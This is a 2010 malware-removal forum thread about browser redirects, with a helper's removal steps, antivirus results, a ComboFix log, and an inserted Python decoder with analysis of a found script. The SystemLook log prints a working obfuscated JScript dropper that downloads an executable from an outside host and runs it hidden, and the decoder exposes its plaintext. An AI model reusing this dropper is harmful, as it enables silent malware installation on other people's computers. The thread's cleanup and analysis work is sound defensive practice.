Help re: Browser Redirects & Raptr Install...


Re: Help re: Browser Redirects & Raptr Install...

Posted by melboy » September 23rd, 2010, 1:01 pm

Hi



Check a file

  • Go to VirusTotal
    c:\windows\system32\termsrv.dll
  • Copy/Paste the file above into the white Upload a file box, or click Browse and navigate to the file.
  • Click Send File, and the file will upload to VirusTotal where it will be scanned by several anti-virus programmes.
    NOTE: if you receive a message stating:
    • File already submitted, click Reanalyze.
  • After a while, a window will open, with details of what the scans found.
  • Copy and paste the results into your next reply.



Please download SystemLook from one of the links below and save it to your Desktop.
Download Mirror #1
Download Mirror #2

  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    :file
    c:\program files\.js
    
    :Contents
    c:\program files\.js
    

  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt



COMBOFIX-Script

A word of warning: Please do not run ComboFix on your own. This tool is not for everyday use.


  • Please open Notepad (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the code box below:

    File:: 
    c:\windows\Icuwaf.dat
    c:\windows\Dqovet.bin
    
    Registry::
    [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
    "c:\\Program Files\\UTILS\\Azureus\\Azureus.exe"=-
    
    
    DDS::
    uInternet Settings,ProxyServer = http=127.0.0.1:5555
    Trusted Zone: beatport.com
    
    Firefox::
    FF - ProfilePath - c:\documents and settings\HP_Owner\Application Data\Mozilla\Firefox\Profiles\6ncxoaj9.default\
    FF - HiddenExtension: LoudMo Contextual Ad Assistant: No Registry Reference -
    
    Dirlook::
    c:\documents and settings\HP_Owner\Application Data\Foxix
    c:\documents and settings\HP_Owner\Application Data\Huasq
    c:\documents and settings\HP_Owner\Application Data\Udfyr
    c:\documents and settings\HP_Owner\Application Data\Yfwy
    
    

  • Save this as CFScript.txt and change the "Save as type" to "All Files" and place it on your desktop.

    [Screenshot: CFScript.txt being dragged onto ComboFix.exe]
  • Very Important! Temporarily disable your anti-virus, script blocking and any anti-malware real-time protection before following the steps below. They can interfere with ComboFix or remove some of its embedded files which may cause "unpredictable results".
  • If you need help to disable your protection programs see here.
  • Referring to the screenshot above, drag CFScript.txt into ComboFix.exe.
  • ComboFix will now run a scan on your system. It may reboot your system when it finishes. This is normal.
  • When finished, it shall produce a log for you. Copy and paste the contents of the log in your next reply.

CAUTION: Do not mouse-click ComboFix's window while it is running. That may cause it to stall.

Re: Help re: Browser Redirects & Raptr Install...

Posted by ZxcvB123 » September 23rd, 2010, 4:30 pm

Response from VirusTotal..... (results didn't open in a new window until I clicked +compact)
----------------------------------------

Antivirus Version Last update Result
AhnLab-V3 2010.09.23.00 2010.09.23 -
AntiVir 7.10.12.23 2010.09.23 -
Antiy-AVL 2.0.3.7 2010.09.23 -
Authentium 5.2.0.5 2010.09.23 -
Avast 4.8.1351.0 2010.09.23 -
Avast5 5.0.594.0 2010.09.23 -
AVG 9.0.0.851 2010.09.23 -
BitDefender 7.2 2010.09.23 Trojan.Generic.3215710
CAT-QuickHeal 11.00 2010.09.23 -
ClamAV 0.96.2.0-git 2010.09.23 -
Comodo 6178 2010.09.23 -
DrWeb 5.0.2.03300 2010.09.23 -
Emsisoft 5.0.0.37 2010.09.23 Virus.Win32.Ursnif.B!IK
eSafe 7.0.17.0 2010.09.21 -
eTrust-Vet 36.1.7872 2010.09.23 -
F-Prot 4.6.2.117 2010.09.23 -
F-Secure 9.0.15370.0 2010.09.23 Trojan.Generic.3215710
Fortinet 4.1.143.0 2010.09.23 W32/Patched.E!tr
GData 21 2010.09.23 Trojan.Generic.3215710
Ikarus T3.1.1.88.0 2010.09.23 Virus.Win32.Ursnif.B
Jiangmin 13.0.900 2010.09.21 -
K7AntiVirus 9.63.2589 2010.09.23 Trojan
Kaspersky 7.0.0.125 2010.09.23 -
McAfee 5.400.0.1158 2010.09.23 Patched Termsrv
McAfee-GW-Edition 2010.1C 2010.09.23 Patched Termsrv
Microsoft 1.6201 2010.09.23 VirTool:Win32/Ursnif.B
NOD32 5474 2010.09.23 Win32/Spy.Ursnif.A
Norman 6.06.06 2010.09.23 -
nProtect 2010-09-23.02 2010.09.23 Trojan.Generic.3215710
Panda 10.0.2.7 2010.09.23 Trj/CI.A
PCTools 7.0.3.5 2010.09.23 -
Prevx 3.0 2010.09.23 -
Rising 22.66.00.07 2010.09.21 -
Sophos 4.58.0 2010.09.23 -
Sunbelt 6918 2010.09.23 Trojan.Win32.Generic!BT
SUPERAntiSpyware 4.40.0.1006 2010.09.23 -
Symantec 20101.1.1.7 2010.09.23 -
TheHacker 6.7.0.0.029 2010.09.23 -
TrendMicro 9.120.0.1004 2010.09.23 -
TrendMicro-HouseCall 9.120.0.1004 2010.09.23 -
VBA32 3.12.14.1 2010.09.22 -
ViRobot 2010.9.23.4057 2010.09.23 -
VirusBuster 12.65.23.0 2010.09.23 -



______________________________________
Results from SystemLook
______________________________________
SystemLook 04.09.10 by jpshortstuff
Log created at 21:25 on 23/09/2010 by HP_Owner
Administrator - Elevation successful

========== file ==========

c:\program files\.js - File found and opened.
MD5: 051B3E1D962B6D3BF291085C82519779
Created at 22:32 on 12/09/2010
Modified at 22:32 on 12/09/2010
Size: 396 bytes
Attributes: --a----
No version information available.

========== Contents ==========

c:\program files\.js - Opened succesfully.

new Function(ad(';)0,f(nuR.s;)2,f(eliFoTevaS.o;)ydoBesnopser.x(etirW.o;)(nepO.o;1=epyT.o;3=edoM.o;)(dnes.x;)0,"php.ssorcgnilradsrehtom/y/cc.ssnalceht//:ptth","TEG"(nepo.x;"exe.0/"+)"PMET"(metI.)"ssecorP"(tnemnorivnE.s=f;)"PTTHLMX.tfosorciM"(a wen=x;)"maertS.BDODA"(a wen=o;)"llehS.tpircSW"(a wen=s;tcejbOXevitcA = a'))();function ad(bd){r='';for(i=bd.length;i;i--)r+=bd.substr(i,1,1);return r}


-= EOF =-

Running ComboFix Script now....
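
The script SystemLook dumped from c:\program files\.js stores its real body reversed and rebuilds it with ad() before handing it to new Function. The decoder below is an added example written for this page, not code from the thread or from any tool it mentions: it ports ad() exactly (including the off-by-one that never reaches index 0), recovers the plaintext statically without executing anything, and pulls out the indicators a responder would record. The obfuscated string is copied verbatim from the SystemLook output above; the regular expressions, the defanging of the URL and the field names are this example's own choices.

```python
"""Static decoder for the reversed-string JScript dropper found in c:\\program files\\.js.

Added example, not part of the forum thread. The payload below is the argument to
ad() exactly as SystemLook printed it. Nothing here executes the decoded script.
"""
import re

# Copied from the SystemLook "Contents" section above (the string passed to ad()).
OBFUSCATED = (';)0,f(nuR.s;)2,f(eliFoTevaS.o;)ydoBesnopser.x(etirW.o;)(nepO.o;1=epyT.o;'
              '3=edoM.o;)(dnes.x;)0,"php.ssorcgnilradsrehtom/y/cc.ssnalceht//:ptth","TEG"'
              '(nepo.x;"exe.0/"+)"PMET"(metI.)"ssecorP"(tnemnorivnE.s=f;'
              ')"PTTHLMX.tfosorciM"(a wen=x;)"maertS.BDODA"(a wen=o;)"llehS.tpircSW"(a wen=s;'
              'tcejbOXevitcA = a')


def ad(bd: str) -> str:
    """Faithful port of the dropper's decoder:
        function ad(bd){r='';for(i=bd.length;i;i--)r+=bd.substr(i,1,1);return r}
    JScript substr(i,1) yields '' for i == length, and the loop stops before i == 0,
    so the result is the reversed string minus its final character (bd[0], a ';').
    Python's bd[i:i+1] has the same out-of-range behaviour, so the port is exact.
    """
    r = ''
    for i in range(len(bd), 0, -1):
        r += bd[i:i + 1]
    return r


def extract_iocs(script: str) -> dict:
    """Pull indicators out of the decoded JScript with plain regexes (example's own patterns)."""
    # Defang any URL so the result can be pasted into a report without becoming a live link.
    urls = [u.replace('http', 'hxxp', 1) for u in re.findall(r'https?://[^\s"\']+', script)]
    # COM classes instantiated via the ActiveXObject alias, in order of creation.
    com_objects = re.findall(r'new\s+\w+\("([^"]+)"\)', script)
    # Drop location built from an environment variable plus a literal suffix.
    m = re.search(r'Environment\("Process"\)\.Item\("(\w+)"\)\+"([^"]+)"', script)
    drop_path = f'%{m.group(1)}%{m.group(2)}' if m else None
    # WScript.Shell.Run(file, 0): window style 0 runs the payload hidden.
    hidden_window = re.search(r'\.Run\(\w+,\s*0\)', script) is not None
    return {'urls': urls, 'com_objects': com_objects,
            'drop_path': drop_path, 'hidden_window': hidden_window}


def analyse(bd: str = OBFUSCATED) -> dict:
    """Decode a reversed payload and return the plaintext plus extracted indicators."""
    decoded = ad(bd)
    result = {'decoded': decoded}
    result.update(extract_iocs(decoded))
    return result


if __name__ == '__main__':
    report = analyse()
    print(report['decoded'])
    for key in ('urls', 'com_objects', 'drop_path', 'hidden_window'):
        print(f'{key}: {report[key]}')
```

Run stand-alone it prints the de-obfuscated JScript: the dropper creates WScript.Shell, ADODB.Stream and Microsoft.XMLHTTP objects, fetches a binary with a synchronous GET, writes it to %TEMP%\0.exe through the stream object and launches it with window style 0 (hidden). Because ad() never reaches index 0 of its argument, the decoded text lacks the trailing ';' of the original; JScript tolerates that, which is why the off-by-one did not stop the dropper from working.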

Re: Help re: Browser Redirects & Raptr Install...

Posted by ZxcvB123 » September 23rd, 2010, 5:14 pm

ComboFix log, having run the script provided.....
________________________________________

ComboFix 10-09-22.02 - HP_Owner 23/09/2010 21:37:07.2.2 - x86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.3071.2530 [GMT 1:00]
Running from: c:\documents and settings\HP_Owner\Desktop\ComboFix.exe
Command switches used :: c:\documents and settings\HP_Owner\Desktop\CFScript.txt
AV: McAfee Anti-Virus and Anti-Spyware *On-access scanning disabled* (Updated) {84B5EE75-6421-4CDE-A33A-DD43BA9FAD83}
FW: McAfee Firewall *disabled* {94894B63-8C7F-4050-BDA4-813CA00DA3E8}

FILE ::
"c:\windows\Dqovet.bin"
"c:\windows\Icuwaf.dat"
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\windows\Dqovet.bin
c:\windows\Icuwaf.dat

.
((((((((((((((((((((((((( Files Created from 2010-08-23 to 2010-09-23 )))))))))))))))))))))))))))))))
.

2010-09-23 01:38 . 2010-09-23 02:14 -------- d-----w- c:\program files\eMusic Download Manager
2010-09-22 23:09 . 2010-06-14 14:31 744448 -c----w- c:\windows\system32\dllcache\helpsvc.exe
2010-09-22 01:26 . 2010-09-23 20:31 -------- d-----w- C:\_malware logs
2010-09-21 18:04 . 2010-09-21 18:04 -------- d-----w- C:\rsit
2010-09-20 22:43 . 2010-09-21 01:35 -------- d-----w- c:\documents and settings\All Users\Application Data\Spybot - Search & Destroy
2010-09-20 22:43 . 2010-09-20 22:49 -------- d-----w- c:\program files\Spybot - Search & Destroy
2010-09-20 21:51 . 2010-09-22 22:12 -------- d-----w- c:\windows\system32\MpEngineStore
2010-09-20 16:23 . 2010-09-21 18:06 -------- d-----w- c:\program files\Trend Micro
2010-09-14 01:33 . 2010-09-14 07:47 -------- d-----w- C:\ccleaner
2010-09-13 22:26 . 2010-09-13 22:26 -------- d-----w- c:\documents and settings\Administrator\Application Data\Malwarebytes
2010-09-13 18:24 . 2010-09-13 18:24 -------- d-----w- c:\windows\Options
2010-09-13 01:44 . 2010-09-13 01:44 10134 ----a-r- c:\documents and settings\HP_Owner\Application Data\Microsoft\Installer\{4CCC7F68-A437-4559-A840-F5E010934951}\ARPPRODUCTICON.exe
2010-09-12 20:39 . 2010-09-12 20:39 310208 ----a-w- c:\documents and settings\HP_Owner\Application Data\Azureus\plugins\mlab\ShaperProbeC.exe
2010-09-12 20:35 . 2010-09-12 20:35 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\Motive
2010-08-27 21:21 . 2006-08-24 05:44 477696 ----a-r- c:\windows\system32\drivers\ZD1211BU.sys

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2010-09-23 20:32 . 2010-05-02 14:57 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\TeraCopy
2010-09-23 02:14 . 2008-11-28 18:35 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\eMusic
2010-09-22 22:13 . 2006-01-20 08:30 5504 ----a-w- c:\windows\system32\drivers\intelide.sys
2010-09-22 20:09 . 2007-09-29 20:11 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\Azureus
2010-09-19 20:13 . 2009-07-23 18:08 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\vlc
2010-09-14 10:58 . 2010-08-10 09:25 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\Foxix
2010-09-14 10:58 . 2006-08-23 15:39 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\Huasq
2010-09-13 18:24 . 2008-09-18 20:59 -------- d-----w- c:\program files\iTunes
2010-09-13 18:16 . 2006-11-18 09:52 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\Udfyr
2010-09-13 15:15 . 2006-01-20 04:18 -------- d-----w- c:\program files\UTILS
2010-09-13 15:07 . 2008-10-13 13:22 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\Yfwy
2010-09-12 22:32 . 2010-09-12 22:32 396 ----a-w- c:\program files\.js
2010-08-24 13:57 . 2010-04-15 21:10 9344 ----a-w- c:\windows\system32\drivers\mfeclnk.sys
2010-08-24 13:57 . 2010-04-15 21:09 95600 ----a-w- c:\windows\system32\drivers\mfeapfk.sys
2010-08-24 13:57 . 2010-04-15 21:09 88544 ----a-w- c:\windows\system32\drivers\mfendisk.sys
2010-08-24 13:57 . 2010-04-15 21:09 84264 ----a-w- c:\windows\system32\drivers\mferkdet.sys
2010-08-24 13:57 . 2010-04-15 21:09 84072 ----a-w- c:\windows\system32\drivers\mfetdi2k.sys
2010-08-24 13:57 . 2010-04-15 21:09 52104 ----a-w- c:\windows\system32\drivers\mfebopk.sys
2010-08-24 13:57 . 2010-04-15 21:09 386712 ----a-w- c:\windows\system32\drivers\mfehidk.sys
2010-08-24 13:57 . 2010-04-15 21:09 312904 ----a-w- c:\windows\system32\drivers\mfefirek.sys
2010-08-24 13:57 . 2010-04-15 21:09 152992 ----a-w- c:\windows\system32\drivers\mfeavfk.sys
2010-08-24 13:57 . 2010-04-15 21:09 55840 ----a-w- c:\windows\system32\drivers\cfwids.sys
2010-08-17 13:17 . 2006-01-20 08:32 58880 ----a-w- c:\windows\system32\spoolsv.exe
2010-07-22 15:49 . 2006-01-20 08:32 590848 ----a-w- c:\windows\system32\rpcrt4.dll
2010-07-22 05:57 . 2009-04-15 19:31 5120 ----a-w- c:\windows\system32\xpsp4res.dll
2010-06-30 12:31 . 2006-01-20 08:32 149504 ----a-w- c:\windows\system32\schannel.dll
2010-08-24 13:57 . 2010-04-15 21:10 24376 ----a-w- c:\program files\mozilla firefox\components\Scriptff.dll
2005-01-03 22:30 . 2006-01-20 08:54 0 --sha-w- c:\windows\SMINST\HPCD.SYS
.

(((((((((((((((((((((((((((((((((((((((((((( Look )))))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
---- Directory of c:\documents and settings\HP_Owner\Application Data\Foxix ----


---- Directory of c:\documents and settings\HP_Owner\Application Data\Huasq ----


---- Directory of c:\documents and settings\HP_Owner\Application Data\Udfyr ----


---- Directory of c:\documents and settings\HP_Owner\Application Data\Yfwy ----

2010-09-13 15:00 . 2010-09-13 15:00 661159 ----a-w- c:\documents and settings\HP_Owner\Application Data\Yfwy\dehye.tmp


------- Sigcheck -------

[7] 2008-04-14 . FF3477C03BE7201C294C35F684B3479F . 295424 . . [5.1.2600.5512] . . c:\windows\ServicePackFiles\i386\termsrv.dll
[-] 2008-04-14 . 3B58675ED2C6A68C38624681C2548862 . 295424 . . [5.1.2600.5512] . . c:\windows\system32\termsrv.dll
[7] 2008-04-14 . FF3477C03BE7201C294C35F684B3479F . 295424 . . [5.1.2600.5512] . . c:\windows\system32\dllcache\termsrv.dll
[7] 2004-08-03 . B60C877D16D9C880B952FDA04ADF16E6 . 295424 . . [5.1.2600.2180] . . c:\windows\$NtServicePackUninstall$\termsrv.dll
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{9DFE2FE9-CF99-4ADF-A28E-9B5ADB8DC74F}]

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"swg"="c:\program files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2007-07-13 68856]
"SpybotSD TeaTimer"="c:\program files\Spybot - Search & Destroy\TeaTimer.exe" [2009-03-05 2260480]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"hpsysdrv"="c:\windows\system\hpsysdrv.exe" [1998-05-07 52736]
"HPHUPD06"="c:\program files\HP\{AAC4FC36-8F89-4587-8DD3-EBC57C83374D}\hphupd06.exe" [2004-06-07 49152]
"HPHmon06"="c:\windows\system32\hphmon06.exe" [2004-06-07 659456]
"KBD"="c:\hp\KBD\KBD.EXE" [2003-02-11 61440]
"Recguard"="c:\windows\SMINST\RECGUARD.EXE" [2004-04-14 233472]
"SiS Windows KeyHook"="c:\windows\system32\keyhook.exe" [2004-05-20 249856]
"ATIPTA"="c:\program files\ATI Technologies\ATI Control Panel\atiptaxx.exe" [2004-06-24 339968]
"ATICCC"="c:\program files\ATI Technologies\ATI.ACE\cli.exe" [2005-08-12 45056]
"SoundMan"="SOUNDMAN.EXE" [2004-07-01 73728]
"AlcWzrd"="ALCWZRD.EXE" [2004-07-06 2550272]
"PS2"="c:\windows\system32\ps2.exe" [2002-10-16 81920]
"IntelliPoint"="c:\program files\Microsoft IntelliPoint\ipoint.exe" [2007-08-31 1037736]
"HP Software Update"="c:\program files\HP\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2009-10-28 141600]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2010-06-09 976832]
"mcui_exe"="c:\program files\McAfee.com\Agent\mcagent.exe" [2010-06-30 1193848]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2010-06-20 35760]
"AGRSMMSG"="AGRSMMSG.exe" [2004-06-29 88363]
"Malwarebytes' Anti-Malware"="c:\program files\Malwarebytes' Anti-Malware\mbamgui.exe" [2010-04-29 437584]

c:\documents and settings\HP_Owner\Start Menu\Programs\Startup\
Adobe Gamma.lnk - c:\program files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe [2005-3-16 113664]

c:\documents and settings\All Users\Start Menu\Programs\Startup\
Acrobat Assistant.lnk - c:\program files\Adobe\Acrobat 6.0\Distillr\acrotray.exe [2003-5-15 217193]
HP Digital Imaging Monitor.lnk - c:\program files\HP\Digital Imaging\bin\hpqtra08.exe [2005-5-12 282624]
HP Image Zone Fast Start.lnk - c:\program files\HP\Digital Imaging\bin\hpqthb08.exe [2005-5-12 73728]
Microsoft Office.lnk - c:\program files\Microsoft Office\Office10\OSA.EXE [2001-2-13 83360]
Windows Home Server.lnk - c:\windows\Installer\{21E49794-7C13-4E84-8659-55BD378267D5}\WHSTrayApp.exe [2010-2-20 604008]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
"RequireSignedAppInit_DLLs"=1 (0x1)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcmscsvc]
@=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CloneCDTray]
2006-09-28 19:21 57344 ----a-w- c:\program files\SlySoft\CloneCD\CloneCDTray.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Home Theater SchSvr]
2004-07-30 10:34 155648 ----a-w- c:\program files\Common Files\InterVideo\SchSvr\SchSvr.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\mxomssmenu]
2007-09-06 14:53 169264 ----a-w- c:\program files\Maxtor\OneTouch Status\MaxMenuMgr.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2009-09-05 00:54 417792 ----a-w- c:\program files\QuickTime\QTTask.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TkBellExe]
2009-11-02 22:52 198160 ----a-w- c:\program files\Common Files\Real\Update_OB\realsched.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Windows Media Connect 2]
2006-10-18 20:58 8704 ------w- c:\program files\Windows Media Connect 2\WMCCFG.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\WINREMOTE]
2004-07-30 10:41 192512 ----a-w- c:\program files\InterVideo\Common\Bin\WinRemote.exe

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiVirus]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeFirewall]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecFirewall]
"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqtra08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqste08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpofxm08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hposfx08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hposid01.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqscnvw.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqkygrp.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqCopy.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpfccopy.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpzwiz01.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\Unload\\HpqPhUnl.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\Unload\\HpqDIA.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpoews01.exe"=
"c:\\Program Files\\Messenger\\msmsgs.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"c:\\Program Files\\SmartFTP Client 2.0\\SmartFTP.exe"=
"c:\\Program Files\\Common Files\\AOL\\Loader\\aolload.exe"=
"c:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"c:\\Program Files\\Spotify\\spotify.exe"=
"c:\\Program Files\\iTunes\\iTunes.exe"=
"c:\\Program Files\\TVersity\\Media Server\\MediaServer.exe"=
"c:\\Program Files\\Common Files\\McAfee\\McSvcHost\\McSvHost.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"3587:TCP"= 3587:TCP:Windows Peer-to-Peer Grouping
"3540:UDP"= 3540:UDP:Peer Name Resolution Protocol (PNRP)
"3389:TCP"= 3389:TCP:@xpsp2res.dll,-22009

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\IcmpSettings]
"AllowInboundEchoRequest"= 1 (0x1)

R1 mfetdi2k;McAfee Inc. mfetdi2k;c:\windows\system32\drivers\mfetdi2k.sys [15/04/2010 22:09 84072]
R2 HPMSSConnectorSvc;HPMSSConnectorService;c:\program files\Hewlett-Packard\HP MediaSmart Server\MSSConnectorService.exe [05/10/2009 12:09 20992]
R2 Iprip;RIP Listener;c:\windows\System32\svchost.exe -k netsvcs [20/01/2006 09:32 14336]
R2 MBAMService;MBAMService;c:\program files\Malwarebytes' Anti-Malware\mbamservice.exe [04/05/2010 01:17 304464]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\program files\McAfee\SiteAdvisor\McSACore.exe [13/01/2010 23:35 88176]
R2 McMPFSvc;McAfee Personal Firewall Service;"c:\program files\Common Files\Mcafee\McSvcHost\McSvHost.exe" /McCoreSvc [15/04/2010 22:09 271480]
R2 McNaiAnn;McAfee VirusScan Announcer;"c:\program files\Common Files\McAfee\McSvcHost\McSvHost.exe" /McCoreSvc [15/04/2010 22:09 271480]
R2 MediaCollectorService;MediaCollectorService;c:\program files\Hewlett-Packard\HP MediaSmart Server\MediaCollectorClient.exe [05/10/2009 12:09 81920]
R2 mfefire;McAfee Firewall Core Service;c:\program files\Common Files\McAfee\SystemCore\mfefire.exe [15/04/2010 22:10 188136]
R2 mfevtp;McAfee Validation Trust Protection Service;c:\program files\Common Files\McAfee\SystemCore\mfevtps.exe [15/04/2010 22:09 141792]
R2 WHSConnector;Windows Home Server Connector Service;c:\program files\Windows Home Server\WHSConnector.exe [07/10/2009 14:48 376680]
R3 cfwids;McAfee Inc. cfwids;c:\windows\system32\drivers\cfwids.sys [15/04/2010 22:09 55840]
R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [04/05/2010 01:17 20952]
R3 mfefirek;McAfee Inc. mfefirek;c:\windows\system32\drivers\mfefirek.sys [15/04/2010 22:09 312904]
R3 mfendiskmp;mfendiskmp;c:\windows\system32\drivers\mfendisk.sys [15/04/2010 22:09 88544]
R3 PhTVTune;ASUS WDM TV Tuner;c:\windows\system32\drivers\PhTVTune.sys [02/01/2004 03:19 24608]
S2 gupdate;Google Update Service (gupdate);c:\program files\Google\Update\GoogleUpdate.exe [29/01/2010 03:46 135664]
S3 mfendisk;McAfee Core NDIS Intermediate Filter;c:\windows\system32\drivers\mfendisk.sys [15/04/2010 22:09 88544]
S3 mferkdet;McAfee Inc. mferkdet;c:\windows\system32\drivers\mferkdet.sys [15/04/2010 22:09 84264]
S3 xbreader;MaxDrive XBox Driver (xbreader.sys);c:\windows\system32\drivers\xbreader.sys [03/01/2001 00:53 19677]

--- Other Services/Drivers In Memory ---

*Deregistered* - mfeavfk01

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
p2psvc REG_MULTI_SZ p2psvc p2pimsvc p2pgasvc PNRPSvc
getPlusHelper REG_MULTI_SZ getPlusHelper
.
Contents of the 'Scheduled Tasks' folder

2010-09-23 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2008-07-30 11:34]

2010-09-23 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-01-29 02:46]

2010-09-23 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-01-29 02:46]

2008-09-16 c:\windows\Tasks\Microsoft_Hardware_Launch_IPoint_exe.job
- c:\program files\Microsoft IntelliPoint\ipoint.exe [2007-08-31 19:01]

2010-09-23 c:\windows\Tasks\User_Feed_Synchronization-{BEDA1DC8-9CAF-4902-8B5F-2FB3702C6673}.job
- c:\windows\system32\msfeedssync.exe [2006-10-17 11:58]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.facebook.com/
uDefault_Search_URL = hxxp://ie.redirect.hp.com/svs/rdr?TYPE= ... pf=desktop
uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
uInternet Settings,ProxyOverride = <local>
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
IE: &Download with &DAP - c:\program files\UTILS\DAP\dapextie.htm
IE: Download &all with DAP - c:\program files\UTILS\DAP\dapextie2.htm
IE: Download All by FlashGet - c:\progra~1\UTILS\FlashGet\jc_all.htm
IE: Download using FlashGet - c:\progra~1\UTILS\FlashGet\jc_link.htm
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~2\Office10\EXCEL.EXE/3000
IE: Google Sidewiki... - c:\program files\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_89D8574934B26AC4.dll/cmsidewiki.html
Name-Space Handler: ftp\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - c:\program files\UTILS\DAP\dapie.dll
Name-Space Handler: http\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - c:\program files\UTILS\DAP\dapie.dll
FF - ProfilePath - c:\documents and settings\HP_Owner\Application Data\Mozilla\Firefox\Profiles\6ncxoaj9.default\
FF - prefs.js: browser.search.defaulturl - hxxp://flvdirect.iamwired.net/websearch ... ps&search=
FF - prefs.js: browser.search.selectedEngine - Google
FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\
.

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2010-09-23 21:51
Windows 5.1.2600 Service Pack 3 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

